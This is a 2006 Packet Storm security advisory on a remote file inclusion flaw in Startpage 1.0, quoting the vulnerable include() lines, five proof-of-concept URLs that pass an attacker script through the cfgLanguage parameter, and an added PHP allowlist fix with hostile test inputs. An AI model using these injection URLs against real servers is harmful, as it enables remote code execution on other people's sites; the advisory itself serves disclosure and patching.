startpage10.txt

2006-08-27T00:00:00
ID PACKETSTORM:49260
Type packetstorm
Reporter Sh3ll
Modified 2006-08-27T00:00:00

Description

                                        
--------------------------------------------------------------------------------------------
Startpage 1.0 cfgLanguage Remote File Inclusion  
--------------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/08/10  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
--------------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Startpage  
Version : 1.0  
Vendor : http://matthijs.draijer.org  
Class : Remote File Inclusion  
Risk : High  
Summary :   
Startpage v1.0 Is a Script Which Shows Your Favorite Links.  
--------------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
The Problem Exists in edit.php , functions.php , new.php , PageBottom.php & PageTop.php ,  
Which Use The Variable $cfgLanguage in an include() Function Without It Being Declared.  
----------------------------------------edit.php--------------------------------------------  
...  
<?php  
include ("language_$cfgLanguage.php");  
?>  
...  
----------------------------------------functions.php---------------------------------------  
...  
<?php  
include ("config.php");  
include ("language_$cfgLanguage.php");  
?>  
...  
----------------------------------------new.php---------------------------------------------  
...  
<?php  
include ("config.php");  
include ("functions.php");  
include ("PageTop.php");  
include ("language_$cfgLanguage.php");  
connect_db();  
?>  
...  
----------------------------------------PageBottom.php--------------------------------------  
...  
<?php  
include ("config.php");  
include ("language_$cfgLanguage.php");  
?>  
...  
----------------------------------------PageTop.php-----------------------------------------  
...  
<?php  
include ("config.php");  
include ("language_$cfgLanguage.php");  
?>  
...  
--------------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[Startpage]/edit.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize The Variable $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php   
& PageTop.php  
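
One way to carry out the sanitising step from the Solution, as an added example (not Startpage's code and not the advisory author's patch): the requested value is matched against a fixed allowlist and anything else falls back to a default. The helper name resolve_language_file(), the language codes en/nl and the scratch files are assumptions made for the demo.

```php
<?php
// Added example, not Startpage's own code. resolve_language_file() is a
// hypothetical helper; the 'en'/'nl' codes and temp files are constructed.

function resolve_language_file($requested, array $allowed, $default, $baseDir)
{
    // Exact, type-strict allowlist match: URLs, "../" sequences, null bytes
    // and array parameters all fail here and fall back to the default.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        $requested = $default;
    }
    // Absolute path built from a trusted directory, never from the request.
    $real = realpath($baseDir . '/language_' . $requested . '.php');
    $base = realpath($baseDir);
    // Second guard: the file must exist and sit directly inside $baseDir.
    if ($real === false || $base === false || dirname($real) !== $base) {
        throw new RuntimeException('Language file not available');
    }
    return $real;
}

// --- Constructed demo: two language files in a scratch directory ---
$dir = sys_get_temp_dir() . '/startpage_demo_' . getmypid();
mkdir($dir);
foreach (array('en' => 'Links', 'nl' => 'Koppelingen') as $code => $word) {
    file_put_contents("$dir/language_$code.php", "<?php \$strLinks = '$word';\n");
}
$allowed = array('en', 'nl');

// Values that could arrive as cfgLanguage, plus one legitimate value.
$inputs = array('nl', 'http://example.invalid/x.txt?', '../../config', array('en'), null);
foreach ($inputs as $input) {
    $file = resolve_language_file($input, $allowed, 'en', $dir);
    include $file;   // only ever language_en.php or language_nl.php
    $shown = json_encode($input, JSON_UNESCAPED_SLASHES);
    printf("%-34s -> %s (%s)\n", $shown, basename($file), $strLinks);
}

// Clean up the scratch files.
array_map('unlink', glob("$dir/language_*.php"));
rmdir($dir);
```

In the five affected scripts the same call would replace the bare include ("language_$cfgLanguage.php") line, with the base directory passed as a fixed path such as __DIR__.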
--------------------------------------------------------------------------------------------  
Note:  
~~~~  
Vendor Contacted, But No Response. So Do a Dirty Patch.  
--------------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams   